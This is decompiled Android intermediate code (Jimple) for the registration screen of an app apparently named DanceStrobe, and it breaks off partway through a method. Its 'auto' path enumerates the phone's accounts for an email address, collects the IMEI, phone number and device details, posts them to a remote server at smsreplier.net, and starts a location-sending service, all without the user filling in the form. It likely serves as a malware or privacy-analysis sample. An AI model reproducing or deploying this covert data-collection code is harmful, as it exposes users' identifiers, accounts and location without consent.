public class com.iconosys.dancestrobe.RegistrationScreen extends android.app.Activity
{
    public static java.util.regex.Pattern EMAIL_ADDRESS_PATTERN;
    public static final java.util.regex.Pattern PHONE_PATTERN;
    private android.widget.CheckBox Accept;
    private android.widget.EditText Email;
    private android.widget.EditText Name;
    private android.widget.EditText Phone;
    private android.widget.Button Sbt;
    private android.widget.TextView Textlink;
    private android.widget.RadioButton a1518;
    private android.widget.RadioButton a1830;
    private android.widget.RadioButton a30;
    private java.lang.String age;
    private android.widget.RadioButton au15;
    private android.widget.RadioButton female;
    private java.lang.String gender;
    private java.lang.String imei;
    private android.widget.RadioButton male;
    private com.iconosys.dancestrobe.MsgProvider mp;
    private java.lang.String phoneNumber;
    private java.lang.String possibleEmail;
    private android.widget.Button skip;

    static void <clinit>()
    {
        java.util.regex.Pattern $r0;

        $r0 = staticinvoke <java.util.regex.Pattern: java.util.regex.Pattern compile(java.lang.String)>("[a-zA-Z0-9\\+\\.\\_\\%\\-]+\\@[a-zA-Z0-9][a-zA-Z0-9\\-]*(\\.[a-zA-Z0-9][a-zA-Z0-9\\-]*)+");

        <com.iconosys.dancestrobe.RegistrationScreen: java.util.regex.Pattern EMAIL_ADDRESS_PATTERN> = $r0;

        $r0 = staticinvoke <java.util.regex.Pattern: java.util.regex.Pattern compile(java.lang.String)>("(?:\\+[0-9]+)|(?:[0-9()][0-9()\\- \\.][0-9()\\- \\.]+[0-9])");

        <com.iconosys.dancestrobe.RegistrationScreen: java.util.regex.Pattern PHONE_PATTERN> = $r0;

        return;
    }

    public void <init>()
    {
        com.iconosys.dancestrobe.RegistrationScreen r0;

        r0 := @this: com.iconosys.dancestrobe.RegistrationScreen;

        specialinvoke r0.<android.app.Activity: void <init>()>();

        r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String possibleEmail> = "";

        return;
    }

    private void SendAutoData() throws android.content.pm.PackageManager$NameNotFoundException
    {
        java.lang.Throwable $r12, $r14;
        org.apache.http.impl.client.DefaultHttpClient $r15;
        org.apache.http.message.BasicNameValuePair $r18;
        org.apache.http.client.methods.HttpPost r2, $r16;
        android.content.pm.PackageManager $r4;
        org.apache.http.client.entity.UrlEncodedFormEntity $r20;
        android.content.Intent r1, $r21;
        org.apache.http.client.methods.HttpUriRequest $r24;
        android.content.pm.PackageInfo $r6;
        android.text.Editable $r11;
        java.util.ArrayList r3, $r17;
        org.apache.http.client.HttpClient $r23;
        com.iconosys.dancestrobe.MsgProvider $r9;
        android.widget.Toast $r13;
        int $i0;
        java.lang.String $r5;
        boolean $z0;
        org.apache.http.HttpEntity $r22;
        com.iconosys.dancestrobe.RegistrationScreen r0;
        java.lang.StringBuilder $r8, $r19;
        android.widget.EditText $r10;

        r0 := @this: com.iconosys.dancestrobe.RegistrationScreen;

        $r15 = new org.apache.http.impl.client.DefaultHttpClient;

        specialinvoke $r15.<org.apache.http.impl.client.DefaultHttpClient: void <init>()>();

        $r16 = new org.apache.http.client.methods.HttpPost;

        r2 = $r16;

        specialinvoke $r16.<org.apache.http.client.methods.HttpPost: void <init>(java.lang.String)>("http://smsreplier.net/smsreply/regandwelcome.php");

        $r4 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.content.pm.PackageManager getPackageManager()>();

        $r5 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String getPackageName()>();

        $r6 = virtualinvoke $r4.<android.content.pm.PackageManager: android.content.pm.PackageInfo getPackageInfo(java.lang.String,int)>($r5, 0);

        $r17 = new java.util.ArrayList;

        r3 = $r17;

     label01:
        specialinvoke $r17.<java.util.ArrayList: void <init>(int)>(2);

     label02:
        $r18 = new org.apache.http.message.BasicNameValuePair;

     label03:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("Name", "XXXX");

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label04:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String possibleEmail>;

     label05:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("Email", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label06:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String imei>;

     label07:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("imei", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label08:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber>;

     label09:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("phoneno", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label10:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = <android.os.Build: java.lang.String BRAND>;

     label11:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("brand", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label12:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = <android.os.Build: java.lang.String DEVICE>;

     label13:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("device", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label14:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = <android.os.Build: java.lang.String MODEL>;

     label15:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("model", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label16:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = <android.os.Build: java.lang.String PRODUCT>;

     label17:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("product", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label18:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r19 = new java.lang.StringBuilder;

        $r5 = <android.os.Build$VERSION: java.lang.String RELEASE>;

     label19:
        $r5 = staticinvoke <java.lang.String: java.lang.String valueOf(java.lang.Object)>($r5);

        specialinvoke $r19.<java.lang.StringBuilder: void <init>(java.lang.String)>($r5);

        $r8 = virtualinvoke $r19.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("-app ver:");

     label20:
        $i0 = $r6.<android.content.pm.PackageInfo: int versionCode>;

     label21:
        $r8 = virtualinvoke $r8.<java.lang.StringBuilder: java.lang.StringBuilder append(int)>($i0);

        $r5 = virtualinvoke $r8.<java.lang.StringBuilder: java.lang.String toString()>();

        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("version", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label22:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = $r6.<android.content.pm.PackageInfo: java.lang.String packageName>;

     label23:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("smsver", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label24:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String gender>;

     label25:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("gender", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label26:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String age>;

     label27:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("age", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label28:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber>;

     label29:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("realphoneno", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label30:
        $r20 = new org.apache.http.client.entity.UrlEncodedFormEntity;

     label31:
        specialinvoke $r20.<org.apache.http.client.entity.UrlEncodedFormEntity: void <init>(java.util.List)>(r3);

     label32:
        $r22 = (org.apache.http.HttpEntity) $r20;

     label33:
        virtualinvoke r2.<org.apache.http.client.methods.HttpPost: void setEntity(org.apache.http.HttpEntity)>($r22);

     label34:
        $r23 = (org.apache.http.client.HttpClient) $r15;

        $r24 = (org.apache.http.client.methods.HttpUriRequest) r2;

     label35:
        interfaceinvoke $r23.<org.apache.http.client.HttpClient: org.apache.http.HttpResponse execute(org.apache.http.client.methods.HttpUriRequest)>($r24);

     label36:
        $r9 = r0.<com.iconosys.dancestrobe.RegistrationScreen: com.iconosys.dancestrobe.MsgProvider mp>;

     label37:
        virtualinvoke $r9.<com.iconosys.dancestrobe.MsgProvider: boolean updateTitle(long,java.lang.String)>(7L, "Y");

     label38:
        $r9 = r0.<com.iconosys.dancestrobe.RegistrationScreen: com.iconosys.dancestrobe.MsgProvider mp>;

        $r10 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Name>;

     label39:
        $r11 = virtualinvoke $r10.<android.widget.EditText: android.text.Editable getText()>();

        $r5 = interfaceinvoke $r11.<android.text.Editable: java.lang.String toString()>();

        virtualinvoke $r9.<com.iconosys.dancestrobe.MsgProvider: boolean updateTitle(long,java.lang.String)>(8L, $r5);

     label40:
        $r9 = r0.<com.iconosys.dancestrobe.RegistrationScreen: com.iconosys.dancestrobe.MsgProvider mp>;

        $r10 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Phone>;

     label41:
        $r11 = virtualinvoke $r10.<android.widget.EditText: android.text.Editable getText()>();

        $r5 = interfaceinvoke $r11.<android.text.Editable: java.lang.String toString()>();

        virtualinvoke $r9.<com.iconosys.dancestrobe.MsgProvider: boolean updateTitle(long,java.lang.String)>(9L, $r5);

     label42:
        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber>;

     label43:
        $z0 = virtualinvoke $r5.<java.lang.String: boolean equals(java.lang.Object)>("XXXX");

     label44:
        if $z0 != 0 goto label49;

        $r21 = new android.content.Intent;

        r1 = $r21;

     label45:
        specialinvoke $r21.<android.content.Intent: void <init>(android.content.Context,java.lang.Class)>(r0, class "Lcom/iconosys/dancestrobe/LocationSender;");

        virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.content.ComponentName startService(android.content.Intent)>(r1);

     label46:
        return;

     label47:
        $r12 := @caughtexception;

        $r13 = staticinvoke <android.widget.Toast: android.widget.Toast makeText(android.content.Context,java.lang.CharSequence,int)>(r0, "No Active Data connection found..Please try again !!!", 1);

        virtualinvoke $r13.<android.widget.Toast: void show()>();

        return;

     label48:
        $r14 := @caughtexception;

        $r13 = staticinvoke <android.widget.Toast: android.widget.Toast makeText(android.content.Context,java.lang.CharSequence,int)>(r0, "No Active Data connection found..Please try again !!!", 1);

        virtualinvoke $r13.<android.widget.Toast: void show()>();

     label49:
        return;

        catch org.apache.http.client.ClientProtocolException from label01 to label02 with label47;
        catch org.apache.http.client.ClientProtocolException from label03 to label04 with label47;
        catch org.apache.http.client.ClientProtocolException from label05 to label06 with label47;
        catch org.apache.http.client.ClientProtocolException from label07 to label08 with label47;
        catch org.apache.http.client.ClientProtocolException from label09 to label10 with label47;
        catch org.apache.http.client.ClientProtocolException from label11 to label12 with label47;
        catch org.apache.http.client.ClientProtocolException from label13 to label14 with label47;
        catch org.apache.http.client.ClientProtocolException from label15 to label16 with label47;
        catch org.apache.http.client.ClientProtocolException from label17 to label18 with label47;
        catch org.apache.http.client.ClientProtocolException from label19 to label20 with label47;
        catch org.apache.http.client.ClientProtocolException from label21 to label22 with label47;
        catch org.apache.http.client.ClientProtocolException from label23 to label24 with label47;
        catch org.apache.http.client.ClientProtocolException from label25 to label26 with label47;
        catch org.apache.http.client.ClientProtocolException from label27 to label28 with label47;
        catch org.apache.http.client.ClientProtocolException from label29 to label30 with label47;
        catch org.apache.http.client.ClientProtocolException from label31 to label32 with label47;
        catch org.apache.http.client.ClientProtocolException from label33 to label34 with label47;
        catch org.apache.http.client.ClientProtocolException from label35 to label36 with label47;
        catch org.apache.http.client.ClientProtocolException from label37 to label38 with label47;
        catch org.apache.http.client.ClientProtocolException from label39 to label40 with label47;
        catch org.apache.http.client.ClientProtocolException from label41 to label42 with label47;
        catch org.apache.http.client.ClientProtocolException from label43 to label44 with label47;
        catch org.apache.http.client.ClientProtocolException from label45 to label46 with label47;
        catch java.io.IOException from label01 to label02 with label48;
        catch java.io.IOException from label03 to label04 with label48;
        catch java.io.IOException from label05 to label06 with label48;
        catch java.io.IOException from label07 to label08 with label48;
        catch java.io.IOException from label09 to label10 with label48;
        catch java.io.IOException from label11 to label12 with label48;
        catch java.io.IOException from label13 to label14 with label48;
        catch java.io.IOException from label15 to label16 with label48;
        catch java.io.IOException from label17 to label18 with label48;
        catch java.io.IOException from label19 to label20 with label48;
        catch java.io.IOException from label21 to label22 with label48;
        catch java.io.IOException from label23 to label24 with label48;
        catch java.io.IOException from label25 to label26 with label48;
        catch java.io.IOException from label27 to label28 with label48;
        catch java.io.IOException from label29 to label30 with label48;
        catch java.io.IOException from label31 to label32 with label48;
        catch java.io.IOException from label33 to label34 with label48;
        catch java.io.IOException from label35 to label36 with label48;
        catch java.io.IOException from label37 to label38 with label48;
        catch java.io.IOException from label39 to label40 with label48;
        catch java.io.IOException from label41 to label42 with label48;
        catch java.io.IOException from label43 to label44 with label48;
        catch java.io.IOException from label45 to label46 with label48;
    }

    private void SendAutoPhoneData()
    {
        android.accounts.AccountManager $r3;
        android.accounts.Account r1;
        java.lang.String[] $r6;
        com.iconosys.dancestrobe.RegistrationScreen r0;
        android.accounts.Account[] $r4;
        int $i0, $i1;
        com.iconosys.dancestrobe.RegistrationScreen$SendToAutoServerTask $r5;
        java.lang.String $r2;
        boolean $z0;

        r0 := @this: com.iconosys.dancestrobe.RegistrationScreen;

        $r3 = staticinvoke <android.accounts.AccountManager: android.accounts.AccountManager get(android.content.Context)>(r0);

        $r4 = virtualinvoke $r3.<android.accounts.AccountManager: android.accounts.Account[] getAccounts()>();

        $i0 = lengthof $r4;

        $i1 = 0;

     label1:
        if $i1 < $i0 goto label4;

        $r2 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String possibleEmail>;

        $z0 = virtualinvoke $r2.<java.lang.String: boolean contains(java.lang.CharSequence)>("@");

        if $z0 != 0 goto label2;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String possibleEmail> = "iconosysemail@rocketmail.com";

     label2:
        $r2 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber>;

        $i0 = virtualinvoke $r2.<java.lang.String: int length()>();

        if $i0 > 5 goto label3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber> = "XXXX";

     label3:
        $r5 = new com.iconosys.dancestrobe.RegistrationScreen$SendToAutoServerTask;

        specialinvoke $r5.<com.iconosys.dancestrobe.RegistrationScreen$SendToAutoServerTask: void <init>(com.iconosys.dancestrobe.RegistrationScreen,com.iconosys.dancestrobe.RegistrationScreen$SendToAutoServerTask)>(r0, null);

        $r6 = newarray (java.lang.String)[0];

        virtualinvoke $r5.<com.iconosys.dancestrobe.RegistrationScreen$SendToAutoServerTask: android.os.AsyncTask execute(java.lang.Object[])>($r6);

        return;

     label4:
        r1 = $r4[$i1];

        $r2 = r1.<android.accounts.Account: java.lang.String name>;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String possibleEmail> = $r2;

        $i1 = $i1 + 1;

        goto label1;
    }

    private void SendPhoneData() throws android.content.pm.PackageManager$NameNotFoundException
    {
        java.lang.Throwable $r12, $r14;
        org.apache.http.impl.client.DefaultHttpClient $r15;
        org.apache.http.message.BasicNameValuePair $r18;
        org.apache.http.client.methods.HttpPost r2, $r16;
        android.content.pm.PackageManager $r4;
        org.apache.http.client.entity.UrlEncodedFormEntity $r20;
        android.content.Intent r1, $r21;
        org.apache.http.client.methods.HttpUriRequest $r24;
        android.content.pm.PackageInfo $r6;
        android.text.Editable $r9;
        java.util.ArrayList r3, $r17;
        org.apache.http.client.HttpClient $r23;
        com.iconosys.dancestrobe.MsgProvider $r11;
        android.widget.Toast $r13;
        int $i0;
        java.lang.String $r5;
        org.apache.http.HttpEntity $r22;
        com.iconosys.dancestrobe.RegistrationScreen r0;
        java.lang.StringBuilder $r10, $r19;
        android.widget.EditText $r8;

        r0 := @this: com.iconosys.dancestrobe.RegistrationScreen;

        $r15 = new org.apache.http.impl.client.DefaultHttpClient;

        specialinvoke $r15.<org.apache.http.impl.client.DefaultHttpClient: void <init>()>();

        $r16 = new org.apache.http.client.methods.HttpPost;

        r2 = $r16;

        specialinvoke $r16.<org.apache.http.client.methods.HttpPost: void <init>(java.lang.String)>("http://smsreplier.net/smsreply/regandwelcome.php");

        $r4 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.content.pm.PackageManager getPackageManager()>();

        $r5 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String getPackageName()>();

        $r6 = virtualinvoke $r4.<android.content.pm.PackageManager: android.content.pm.PackageInfo getPackageInfo(java.lang.String,int)>($r5, 0);

        $r17 = new java.util.ArrayList;

        r3 = $r17;

     label01:
        specialinvoke $r17.<java.util.ArrayList: void <init>(int)>(2);

     label02:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r8 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Name>;

     label03:
        $r9 = virtualinvoke $r8.<android.widget.EditText: android.text.Editable getText()>();

        $r5 = interfaceinvoke $r9.<android.text.Editable: java.lang.String toString()>();

        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("Name", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label04:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r8 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Email>;

     label05:
        $r9 = virtualinvoke $r8.<android.widget.EditText: android.text.Editable getText()>();

        $r5 = interfaceinvoke $r9.<android.text.Editable: java.lang.String toString()>();

        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("Email", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label06:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String imei>;

     label07:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("imei", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label08:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r8 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Phone>;

     label09:
        $r9 = virtualinvoke $r8.<android.widget.EditText: android.text.Editable getText()>();

        $r5 = interfaceinvoke $r9.<android.text.Editable: java.lang.String toString()>();

        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("phoneno", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label10:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = <android.os.Build: java.lang.String BRAND>;

     label11:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("brand", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label12:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = <android.os.Build: java.lang.String DEVICE>;

     label13:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("device", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label14:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = <android.os.Build: java.lang.String MODEL>;

     label15:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("model", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label16:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = <android.os.Build: java.lang.String PRODUCT>;

     label17:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("product", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label18:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r19 = new java.lang.StringBuilder;

        $r5 = <android.os.Build$VERSION: java.lang.String RELEASE>;

     label19:
        $r5 = staticinvoke <java.lang.String: java.lang.String valueOf(java.lang.Object)>($r5);

        specialinvoke $r19.<java.lang.StringBuilder: void <init>(java.lang.String)>($r5);

        $r10 = virtualinvoke $r19.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("-app ver:");

     label20:
        $i0 = $r6.<android.content.pm.PackageInfo: int versionCode>;

     label21:
        $r10 = virtualinvoke $r10.<java.lang.StringBuilder: java.lang.StringBuilder append(int)>($i0);

        $r5 = virtualinvoke $r10.<java.lang.StringBuilder: java.lang.String toString()>();

        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("version", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label22:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = $r6.<android.content.pm.PackageInfo: java.lang.String packageName>;

     label23:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("smsver", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label24:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String gender>;

     label25:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("gender", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label26:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String age>;

     label27:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("age", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label28:
        $r18 = new org.apache.http.message.BasicNameValuePair;

        $r5 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber>;

     label29:
        specialinvoke $r18.<org.apache.http.message.BasicNameValuePair: void <init>(java.lang.String,java.lang.String)>("realphoneno", $r5);

        interfaceinvoke r3.<java.util.List: boolean add(java.lang.Object)>($r18);

     label30:
        $r20 = new org.apache.http.client.entity.UrlEncodedFormEntity;

     label31:
        specialinvoke $r20.<org.apache.http.client.entity.UrlEncodedFormEntity: void <init>(java.util.List)>(r3);

     label32:
        $r22 = (org.apache.http.HttpEntity) $r20;

     label33:
        virtualinvoke r2.<org.apache.http.client.methods.HttpPost: void setEntity(org.apache.http.HttpEntity)>($r22);

     label34:
        $r23 = (org.apache.http.client.HttpClient) $r15;

        $r24 = (org.apache.http.client.methods.HttpUriRequest) r2;

     label35:
        interfaceinvoke $r23.<org.apache.http.client.HttpClient: org.apache.http.HttpResponse execute(org.apache.http.client.methods.HttpUriRequest)>($r24);

     label36:
        $r11 = r0.<com.iconosys.dancestrobe.RegistrationScreen: com.iconosys.dancestrobe.MsgProvider mp>;

     label37:
        virtualinvoke $r11.<com.iconosys.dancestrobe.MsgProvider: boolean updateTitle(long,java.lang.String)>(7L, "Y");

     label38:
        $r11 = r0.<com.iconosys.dancestrobe.RegistrationScreen: com.iconosys.dancestrobe.MsgProvider mp>;

        $r8 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Name>;

     label39:
        $r9 = virtualinvoke $r8.<android.widget.EditText: android.text.Editable getText()>();

        $r5 = interfaceinvoke $r9.<android.text.Editable: java.lang.String toString()>();

        virtualinvoke $r11.<com.iconosys.dancestrobe.MsgProvider: boolean updateTitle(long,java.lang.String)>(8L, $r5);

     label40:
        $r11 = r0.<com.iconosys.dancestrobe.RegistrationScreen: com.iconosys.dancestrobe.MsgProvider mp>;

        $r8 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Phone>;

     label41:
        $r9 = virtualinvoke $r8.<android.widget.EditText: android.text.Editable getText()>();

        $r5 = interfaceinvoke $r9.<android.text.Editable: java.lang.String toString()>();

        virtualinvoke $r11.<com.iconosys.dancestrobe.MsgProvider: boolean updateTitle(long,java.lang.String)>(9L, $r5);

     label42:
        $r21 = new android.content.Intent;

        r1 = $r21;

     label43:
        specialinvoke $r21.<android.content.Intent: void <init>(android.content.Context,java.lang.Class)>(r0, class "Lcom/iconosys/dancestrobe/LocationSender;");

        virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.content.ComponentName startService(android.content.Intent)>(r1);

     label44:
        return;

     label45:
        $r12 := @caughtexception;

        $r13 = staticinvoke <android.widget.Toast: android.widget.Toast makeText(android.content.Context,java.lang.CharSequence,int)>(r0, "No Active Data connection found..Please try again !!!", 1);

        virtualinvoke $r13.<android.widget.Toast: void show()>();

        return;

     label46:
        $r14 := @caughtexception;

        $r13 = staticinvoke <android.widget.Toast: android.widget.Toast makeText(android.content.Context,java.lang.CharSequence,int)>(r0, "No Active Data connection found..Please try again !!!", 1);

        virtualinvoke $r13.<android.widget.Toast: void show()>();

        return;

        catch org.apache.http.client.ClientProtocolException from label01 to label02 with label45;
        catch org.apache.http.client.ClientProtocolException from label03 to label04 with label45;
        catch org.apache.http.client.ClientProtocolException from label05 to label06 with label45;
        catch org.apache.http.client.ClientProtocolException from label07 to label08 with label45;
        catch org.apache.http.client.ClientProtocolException from label09 to label10 with label45;
        catch org.apache.http.client.ClientProtocolException from label11 to label12 with label45;
        catch org.apache.http.client.ClientProtocolException from label13 to label14 with label45;
        catch org.apache.http.client.ClientProtocolException from label15 to label16 with label45;
        catch org.apache.http.client.ClientProtocolException from label17 to label18 with label45;
        catch org.apache.http.client.ClientProtocolException from label19 to label20 with label45;
        catch org.apache.http.client.ClientProtocolException from label21 to label22 with label45;
        catch org.apache.http.client.ClientProtocolException from label23 to label24 with label45;
        catch org.apache.http.client.ClientProtocolException from label25 to label26 with label45;
        catch org.apache.http.client.ClientProtocolException from label27 to label28 with label45;
        catch org.apache.http.client.ClientProtocolException from label29 to label30 with label45;
        catch org.apache.http.client.ClientProtocolException from label31 to label32 with label45;
        catch org.apache.http.client.ClientProtocolException from label33 to label34 with label45;
        catch org.apache.http.client.ClientProtocolException from label35 to label36 with label45;
        catch org.apache.http.client.ClientProtocolException from label37 to label38 with label45;
        catch org.apache.http.client.ClientProtocolException from label39 to label40 with label45;
        catch org.apache.http.client.ClientProtocolException from label41 to label42 with label45;
        catch org.apache.http.client.ClientProtocolException from label43 to label44 with label45;
        catch java.io.IOException from label01 to label02 with label46;
        catch java.io.IOException from label03 to label04 with label46;
        catch java.io.IOException from label05 to label06 with label46;
        catch java.io.IOException from label07 to label08 with label46;
        catch java.io.IOException from label09 to label10 with label46;
        catch java.io.IOException from label11 to label12 with label46;
        catch java.io.IOException from label13 to label14 with label46;
        catch java.io.IOException from label15 to label16 with label46;
        catch java.io.IOException from label17 to label18 with label46;
        catch java.io.IOException from label19 to label20 with label46;
        catch java.io.IOException from label21 to label22 with label46;
        catch java.io.IOException from label23 to label24 with label46;
        catch java.io.IOException from label25 to label26 with label46;
        catch java.io.IOException from label27 to label28 with label46;
        catch java.io.IOException from label29 to label30 with label46;
        catch java.io.IOException from label31 to label32 with label46;
        catch java.io.IOException from label33 to label34 with label46;
        catch java.io.IOException from label35 to label36 with label46;
        catch java.io.IOException from label37 to label38 with label46;
        catch java.io.IOException from label39 to label40 with label46;
        catch java.io.IOException from label41 to label42 with label46;
        catch java.io.IOException from label43 to label44 with label46;
    }

    static void access$0(com.iconosys.dancestrobe.RegistrationScreen) throws android.content.pm.PackageManager$NameNotFoundException
    {
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        specialinvoke $r0.<com.iconosys.dancestrobe.RegistrationScreen: void SendPhoneData()>();

        return;
    }

    static void access$1(com.iconosys.dancestrobe.RegistrationScreen) throws android.content.pm.PackageManager$NameNotFoundException
    {
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        specialinvoke $r0.<com.iconosys.dancestrobe.RegistrationScreen: void SendAutoData()>();

        return;
    }

    static android.widget.RadioButton access$10(com.iconosys.dancestrobe.RegistrationScreen)
    {
        android.widget.RadioButton r1;
